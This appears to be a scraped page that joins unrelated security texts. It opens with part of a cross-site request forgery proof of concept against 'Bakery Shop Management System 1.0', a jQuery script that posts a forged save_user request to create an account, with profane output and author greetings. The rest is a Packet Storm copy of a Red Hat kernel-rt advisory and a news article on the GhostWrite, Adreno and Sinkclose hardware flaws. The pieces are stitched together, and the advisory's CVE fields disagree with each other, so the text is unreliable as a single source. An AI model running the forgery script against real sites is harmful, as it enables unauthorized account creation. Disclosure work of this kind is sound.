<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>  
<script>  
    $(function(){  
        $('#user-form').submit(function(e){  
            e.preventDefault();  
            $('.pop_msg').remove(); // Remove any previous pop-up messages

            var _this = $(this);  
            var _el = $('<div>').addClass('pop_msg');

            $('#user-form button[type="submit"]').attr('disabled', true).text('Submitting form...');

            $.ajax({  
                url: 'http://127.0.0.1/bsms/Actions.php?a=save_user',  
                method: 'POST',  
                data: _this.serialize(),  
                dataType: 'JSON',  
                error: function(err) {  
                    console.log(err);  
                    _el.addClass('alert alert-danger').text("Yes Mother fucker !");  
                    _this.prepend(_el);  
                    _el.show('slow');  
                    $('#user-form button[type="submit"]').attr('disabled', false).text('Save');  
                },  
                success: function(resp) {  
                    if (resp.status == 'success') {  
                        _el.addClass('alert alert-success').text(resp.msg);  
                        _this.prepend(_el);  
                        _el.show('slow');

                        $('#user-form').get(0).reset(); // Reset form after successful submission

                        // Optional: reload page after a short delay  
                        setTimeout(function() {  
                            location.reload();  
                        }, 2000);

                    } else {  
                        _el.addClass('alert alert-danger').text(resp.msg);  
                        _this.prepend(_el);  
                        _el.show('slow');  
                    }

                    $('#user-form button[type="submit"]').attr('disabled', false).text('Save');  
                }  
            });  
        });  
    });

  </script>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Bakery Shop Management System 1.0 Cross Site Request Forgery

Red Hat Security Advisory 2024-5256-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions. Issues addressed include code execution, denial of service, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5256.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security update  
Advisory ID:        RHSA-2024:5256-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5256  
Issue date:         2024-08-13  
Revision:           03  
CVE Names:          CVE-2021-47624  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: netfilter: nf_tables: disallow anonymous set with timeout flag (CVE-2024-26642)

* kernel: netfilter: nft_chain_filter: handle NETDEV_UNREGISTER for inet/ingress basechain (CVE-2024-26808)

* kernel: TIPC message reassembly use-after-free remote code execution vulnerability (CVE-2024-36886)

* kernel: fs: sysfs: Fix reference leak in sysfs_break_active_protection() (CVE-2024-26993)

* kernel: dmaengine/idxd: hardware erratum allows potential security problem with direct access by untrusted application (CVE-2024-21823)

* kernel: netfilter: nf_tables: use timestamp to check for set element timeout (CVE-2024-27397)

* kernel: netfilter: nft_flow_offload: reset dst in route object after setting up flow (CVE-2024-27403)

* kernel: netfilter: nf_tables: Fix potential data-race in __nft_flowtable_type_get() (CVE-2024-35898)

* kernel: netfilter: nf_tables: discard table flag update with pending basechain deletion (CVE-2024-35897)

* kernel: net: CVE-2024-36971 kernel: UAF in network route management (CVE-2024-36971)

* kernel: ionic: fix use after netif_napi_del() (CVE-2024-39502)

* kernel: scsi: qedi: Fix crash while reading debugfs attribute (CVE-2024-40978)

* kernel: net/sunrpc: fix reference count leaks in rpc_sysfs_xprt_state_change (CVE-2021-47624)

* kernel: virtio-net: tap: mlx5_core short frame denial of service (CVE-2024-41090)

* kernel: virtio-net: tun: mlx5_core short frame denial of service (CVE-2024-41091)

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-9.0.z Batch 19 (JIRA:RHEL-45540)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47624

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2270881  
https://bugzilla.redhat.com/show_bug.cgi?id=2273405  
https://bugzilla.redhat.com/show_bug.cgi?id=2277238  
https://bugzilla.redhat.com/show_bug.cgi?id=2278314  
https://bugzilla.redhat.com/show_bug.cgi?id=2278989  
https://bugzilla.redhat.com/show_bug.cgi?id=2280434  
https://bugzilla.redhat.com/show_bug.cgi?id=2281127  
https://bugzilla.redhat.com/show_bug.cgi?id=2281669  
https://bugzilla.redhat.com/show_bug.cgi?id=2281672  
https://bugzilla.redhat.com/show_bug.cgi?id=2292331  
https://bugzilla.redhat.com/show_bug.cgi?id=2297474  
https://bugzilla.redhat.com/show_bug.cgi?id=2297562  
https://bugzilla.redhat.com/show_bug.cgi?id=2298108  
https://bugzilla.redhat.com/show_bug.cgi?id=2299240  
https://bugzilla.redhat.com/show_bug.cgi?id=2299336

Red Hat Security Advisory 2024-5256-03

A team of researchers from the CISPA Helmholtz Center for Information Security in Germany has disclosed an architectural bug impacting Chinese chip company T-Head's XuanTie C910 and C920 RISC-V CPUs that could allow attackers to gain unrestricted access to susceptible devices.
The vulnerability has been codenamed GhostWrite. It has been described as a direct CPU bug embedded in the hardware, as

Vulnerability / Hardware Security

A team of researchers from the CISPA Helmholtz Center for Information Security in Germany has disclosed an architectural bug impacting Chinese chip company T-Head's XuanTie C910 and C920 RISC-V CPUs that could allow attackers to gain unrestricted access to susceptible devices.

The vulnerability has been codenamed GhostWrite. It has been described as a direct CPU bug embedded in the hardware, as opposed to a side-channel or transient execution attack.

"This vulnerability allows unprivileged attackers, even those with limited access, to read and write any part of the computer's memory and to control peripheral devices like network cards," the researchers said. "GhostWrite renders the CPU's security features ineffective and cannot be fixed without disabling around half of the CPU's functionality."

CISPA found that the CPU has faulty instructions in its vector extension, an add-on to the RISC-V ISA designed to handle larger data values than the base Instruction Set Architecture (ISA).

These faulty instructions, which the researchers said operate directly on physical memory rather than virtual memory, could bypass the process isolation normally enforced by the operating system and hardware.

As a result, an unprivileged attacker could weaponize this loophole to write to any memory location and sidestep security and isolation features to obtain full, unrestricted access to the device. It could be also be leak any memory content from a machine, including passwords.

"The attack is 100% reliable, deterministic, and takes only microseconds to execute," the researchers said. "Even security measures like Docker containerization or sandboxing cannot stop this attack. Additionally, the attacker can hijack hardware devices that use memory-mapped input/output (MMIO), allowing them to send any commands to these devices."

The most effective countermeasure for GhostWrite is to disable the entire vector functionality, which, however, severely impacts the CPU's performance and capabilities as it turns off roughly 50% of the instruction set.

"Luckily, the vulnerable instructions lie in the vector extension, which can be disabled by the operating system," the researchers noted. "This fully mitigates GhostWrite, but also fully disables vector instructions on the CPU."

"Disabling the vector extension significantly reduces the CPU's performance, especially for tasks that benefit from parallel processing and handling large data sets. Applications relying heavily on these features may experience slower performance or reduced functionality."

The disclosure comes as the Android Red Team at Google revealed more than nine flaws in Qualcomm's Adreno GPU that could permit an attacker with local access to a device to achieve privilege escalation and code execution at the kernel level. The weaknesses have since been patched by the chipset maker.

It also follows the discovery of a new security flaw in AMD processors that could be potentially exploited by an attacker with kernel (aka Ring-0) access to elevate privileges and modify the configuration of System Management Mode (SMM or Ring-2) even when SMM Lock is enabled.

Dubbed Sinkclose by IOActive (aka CVE-2023-31315, CVSS score: 7.5), the vulnerability is said to have remained undetected for nearly two decades. Access to the highest privilege levels on a computer means it allows for disabling security features and installing persistent malware that can go virtually under the radar.

Speaking to WIRED, the company said the only way to remediate an infection would be to physically connect to the CPUs using a hardware-based tool known as SPI Flash programmer and scan the memory for malware installed using SinkClose.

"Improper validation in a model specific register (MSR) could allow a malicious program with ring0 access to modify SMM configuration while SMI lock is enabled, potentially leading to arbitrary code execution," AMD noted in an advisory, stating it intends to release updates to Original Equipment Manufacturers (OEM) to mitigate the issue.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#vulnerability